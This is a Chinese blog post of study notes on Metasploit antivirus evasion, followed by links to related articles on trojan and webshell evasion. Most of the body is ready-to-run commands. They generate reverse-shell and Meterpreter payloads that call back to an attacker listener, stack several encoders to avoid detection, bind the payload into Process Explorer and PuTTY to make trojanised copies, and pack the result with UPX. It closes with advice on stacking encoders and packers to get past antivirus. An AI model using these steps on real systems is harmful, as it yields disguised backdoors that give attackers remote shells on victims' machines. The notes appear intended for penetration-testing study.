Metasploit学习之免杀技术

最新推荐文章于 2023-06-29 10:18:38 发布
最新推荐文章于 2023-06-29 10:18:38 发布
阅读量473 收藏 3
点赞数
分类专栏: 网络安全 metasploit 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44479297/article/details/103895467
版权

文章目录

面杀技术

使用msf攻击载荷生成器创建可独立运行的二进制文件
  1. msfpayload windows/shell_reverse_tcp O 使用O选项来查看可用的参数
  2. msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 X /var/www/payload1.exe
躲避杀毒软件的检测
MSF编码器
  1. MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状
  2. msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
多重编码

``msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe

自定义可执行文件模板

通常情况下,运行msfencode命令时,攻击载荷被嵌入到默认的可执行文件模板中,默认模板文件位于data/remplates/template.exe.虽然这个模板文件会时有更新,但它永远是杀毒软件厂商在创建病毒库时的重点关注对象。实际上,当前版本的msfencode支持使用-x选项使用任意的Windows可执行程序来代替默认模板文件。在下面的例子中,我们重新对攻击载荷进行编码,并将微软Sysinternals套件中的Process Explorer程序作为自定义的可执行程序模板。
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o /var/www/pe_backdoor.exe -e x86/shikata_ga_nai -c 5

隐秘地启动一个攻击载荷

将攻击载荷与正常程序绑定
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 R | msfencode -t exe -x putty.exe -o /var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5

加壳软件

加壳软件是一类能够对可执行文件进行加密压缩并将解压代码嵌入其中的工具。
upx -5 /var/www/payload3.exe

小结

杀毒软件的世界日新月异。当试图对生成的文件进行免杀处理时,应考虑多重使用编码器和加壳软件,或编写自己的专用的工具。

不断积淀
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试-木马免杀的几种方式
MSB_WLAQ的博客
09-28 4535
前言 免杀,又叫免杀技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
软件免杀技术介绍,完善杀毒技术
11-06
软件免杀技术介绍,完善杀毒技术。 软件免杀技术介绍,完善杀毒技术
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7108
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
红队必备技能-免杀
04-02
本套视频教程将通过远控工具介绍、基础原理讲解、免杀工具分析、实战四个模块内容,对免杀技术进行全面剖析讲解! 学完本课程可以免杀市面上%90的杀软,帮助大家对免杀技术有一个清晰的认知,能够掌握常用的免杀工具和进阶思路。
Metasploit免杀
PortugalCR7的博客
06-29 602
本次实验中不管是利用msf中的编码进行编码还是用加壳脚本,目的都是要绕过Windows系统的查杀,但还是不能够逃过杀毒系统的检测,故还是要寻找更好的方式来进行免杀。把cr7.exe放入靶机中运行(成功)(杀毒软件报毒)利用msf自带编码进行编码免杀利用msf自带编码进行编码免杀
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...
weixin_34130389的博客
03-08 523
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结     1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件误认为是木马或病毒;2 1.3. 一些安全领域中使用的部分安全检测产品,也会被杀毒软件误杀。2 1.4. 远程监控技术一样。2 2. 1.3 免杀的发展史2 3. 免杀技...
免杀学习.zip
最新发布
10-06
免杀技术,全称为“免检测技术”,在IT领域,特别是网络安全中,是黑客或恶意软件开发者用来逃避安全软件检测的一种策略。免杀学习主要关注如何让恶意代码避开反病毒软件的检测,以便在目标系统中成功运行。在这个...
最强的免杀软件工具
12-10
免杀技术主要包括代码混淆、虚拟化、沙箱逃逸和签名篡改等。代码混淆通过改变程序的可读性和结构,使反病毒软件难以分析其行为。虚拟化技术则将恶意代码运行在一个虚拟环境中,使其不易被外部观察。沙箱逃逸是指...
2010免杀工具详解
07-20
PEiD则能识别可执行文件使用的编译器和加壳技术,这对于开发和研究免杀技术至关重要。 Metasploit Framework是一个开源的安全框架,其中包含了大量的漏洞利用模块和payloads,黑客可以利用它创建定制化的免杀...
免杀教程——无特征码免杀视频教程下载地址
04-02
在IT安全领域,免杀技术是一项至关重要的技能,特别是对于逆向工程和恶意软件分析人员而言。...对于有兴趣深入学习免杀技术的人来说,这个视频教程可能是一条有价值的途径,提供实践中的技巧和策略。
1.远控免杀专题(1)-基础篇1
08-03
在实际应用中,免杀技术往往需要结合多种手段,如使用Metasploit或Cobalt Strike等工具生成的代码进行免杀处理,并通过本地和在线查杀测试效果。例如,在实验环境中安装360全家桶和火绒等安全软件,然后在VirusTotal...
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
木马免杀浓缩精华版教程
07-13 822
木马免杀浓缩精华版教程木马免杀浓缩精华版教程第一部分:对国内外杀毒软件分析   在讲定位内存特征码前,先要分析国内外著名杀毒软件的内存查杀特点。大家在使用木马过程都会发现,内存查杀,一般都指得被瑞星的内存查杀。瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。像强悍的卡巴,金山,等等它们的内存查杀意义不大,会制作免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有
免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)
热门推荐
anhkgg的专栏
05-22 1万+
00. 概述什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就
免杀技术-基础知识
weixin_34032827的博客
07-17 147
去年年底的一段时间,工作较清闲,当时对免杀做过一段时间研究。当时用的是hacksky的免杀教程。不敢说对免杀技术已经入门,但是当时做了一些学习笔记和学习感悟。hacksky的教程还是很不错的,因为工作的原因,当时没有全部看完,接下来有时间的话会把教程看完。这个大类以后主要记录关于免杀技术方面的文章。文东免杀工具包下载地址http://down.51cto.co...
免杀基础知识总结
w4y2'blog
04-27 1601
最近研究木马免杀,先了解一下基础的免杀知识,看了《杀不死的秘密》、《黑客免杀攻防》等免杀书籍,发现都大同小异,基本内容都是一样的,找特征码,修改特征码....我认为免杀还是要针对杀毒软件查杀特性来做,所谓知己知彼,用在免杀上就特贴切。能够写在书本上的技术肯定不是最新的技术,反病毒软件肯定也有了应对措施,要想真正做到免杀,还是要通过其它渠道学习或是自己深入研究。但是,曾经的免杀方法并不是无用了,而
免杀技术详解
人生代码,代码人生。。。
11-19 4112
[免杀]免杀技术详解 杀毒软件奈我何                     ——免杀技术详解 逆流风 注:本文是去年投给黑客X档案的,与那期的主题乐园内容重叠,故未被选上,我也不另投其他杂志,转贴请注明出处,保留版权。 一、加壳免杀 壳按照性质不同可分为压缩壳和加密壳,使用压缩壳压缩过的软件体积会减小很多,我们常用的UPX、ASPACK、FSG就是压缩壳,加密壳是防止软件被破
渗透测试web安全 - webshell 免杀 绕过waf总结
网络安全领域优质创作者
02-21 3034
在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell篇总结如下,肯定有遗漏,之后学习之后再继续补充。 小型网站常见的waf有: D盾 一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异 形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 云锁 云上的安全边界越来越模糊...
免杀技术
weixin_30755393的博客
01-17 469
与防病毒厂商共享信息 VirusTotal https://www.virustotal.com/zh-cn VirScan https://virscan.org 黑产在线查杀引擎 https://nodistribute.com http://viruscheckmate.com扫描网站安全性 http://onlinelinkscan.com 使用...
Metasploit渗透测试实战指南:开源平台与高级技术详解
此外,作者还深入探讨了免杀技术,自动化渗透测试,以及针对无线网络的攻击策略。 高级技术专题如如何扩展Metasploit的功能,提升渗透测试的效率和深度,使得本书不仅是初学者学习渗透测试基础知识的实用手册,也是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值